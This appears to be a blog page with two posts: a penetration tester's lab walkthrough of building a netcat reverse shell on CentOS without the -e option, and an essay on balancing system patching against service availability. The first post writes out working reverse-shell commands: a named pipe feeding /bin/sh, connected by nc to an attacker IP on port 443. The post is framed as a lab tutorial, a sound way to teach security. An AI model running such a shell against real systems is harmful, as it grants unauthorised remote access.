It’s been a long while since I have done any penetration testing; I have been working mostly in a senior leadership role for the last four years. That said, some of my security folks asked me about penetration testing, so I decided to set up a lab. Actually, I built the lab years ago… it is a very modified version of IronGeek’s Mutillidae. We ran through some basics on XSS and SQLi, then I decided to channel Ed and start working on Netcat.
I was really surprised when I tried to set up the ole netcat backdoor shell and got this error:
nc: invalid option -- 'e'
What did you do to my beautiful -e option??? nc, or netcat, removed the -e option. I spent some time tonight consulting the Senior PenTester… Google.
I found it has been deprecated in more recent versions of netcat. I understand why; it is a dangerous option. Dangerous, but oh so much fun! I didn’t find any articles that worked, though I found several that were close. I assume the difference is in the OS. Here is what worked for me.
Remember, I am running CentOS 6.3 in my lab (the victim), and I am using a Mac running Mavericks as the client. This was the magic combo that worked for me. I hope it helps you!
On the attacking system, a Mac running Mavericks. (NOTE: if you listen on a well-known, non-ephemeral port, that is, a port below 1024, you have to run as root.)
nc -l 443
On the victim system, run the following commands. In this case it was CentOS 6.3:
mknod /tmp/ncshell p
/bin/sh 0</tmp/ncshell | nc 192.168.0.10 443 1>/tmp/ncshell
Replace 192.168.0.10 with the IP address of your attacking system.
If you get an access denied error on the mknod command, it doesn’t mean you have to be root; the access denied is on the /tmp path itself. Go hunting for a directory you have permissions to read and write to.
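To see what that named pipe is actually doing, here is a local demo of the same plumbing with nc swapped out for a plain file redirect, so no network is needed. The /tmp/demo_fifo and /tmp/demo_out paths are arbitrary names I picked for the demo; mkfifo is the portable equivalent of `mknod <path> p`.

```shell
#!/bin/sh
# Local demo of the named-pipe plumbing behind the nc backdoor shell.
# mkfifo creates a FIFO, same as `mknod /tmp/demo_fifo p`.
rm -f /tmp/demo_fifo /tmp/demo_out
mkfifo /tmp/demo_fifo

# The shell reads its commands from the FIFO, exactly as in the nc
# version; here its output goes to a file instead of out over nc.
/bin/sh </tmp/demo_fifo >/tmp/demo_out 2>&1 &

# Stand-in for the attacker's input: in the real setup, nc writes
# whatever it receives from the network into the FIFO.
echo 'echo hello from the fifo' >/tmp/demo_fifo

wait
cat /tmp/demo_out   # prints: hello from the fifo
rm -f /tmp/demo_fifo
```

With nc in place of the file redirect, the FIFO closes the loop: the shell’s output travels out over the connection, and whatever the attacker types comes back in through the pipe as the shell’s next command.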
How do we balance customer experience and the availability of services against the need to keep our systems up to date and not vulnerable?
In dealing with operations teams, one topic seems to come up over and over again: the need for regular system-level patching. While everybody agrees that regular patching mitigates the risk of vulnerabilities, it does not come without a price: you need to take your system out of production and make sure that your service is still available. Even with a very complex HA setup that minimizes the downtime, at the end of the day you have to overwrite a system binary with a new version, and with that new version comes the possibility of unintended side effects on your production environment. It becomes clear that testing the new version is essential to minimizing that risk.
So, how do you handle discrepancies between your test and production environments? What do you do when your patch worked just fine in pre-prod but breaks something after rolling it out to production? There is a tendency to immediately seek a risk acceptance from management and stop patching, because the patching is interrupting the normal operation of systems, which obviously goes against the business needs. It is surprising how often that option is picked without even a small investigation into the root cause of the problem.
It is very important to have an independent function in place to question those risk acceptances. Having to explain to an auditor or a forensic team at a later point why a certain vulnerability was not patched puts every security professional in a very tough spot. Additionally, not being able to produce sufficient evidence of a thorough investigation puts the company at risk of audit findings.
In summary: patching is a very important part of your security posture. Every exception should be checked very closely, and the possible consequences need to be made visible to management as well. Thinking about compensating controls at the same time, and even making them part of the risk acceptance process, could be a very useful tool and should allow a healthy weighing of the options.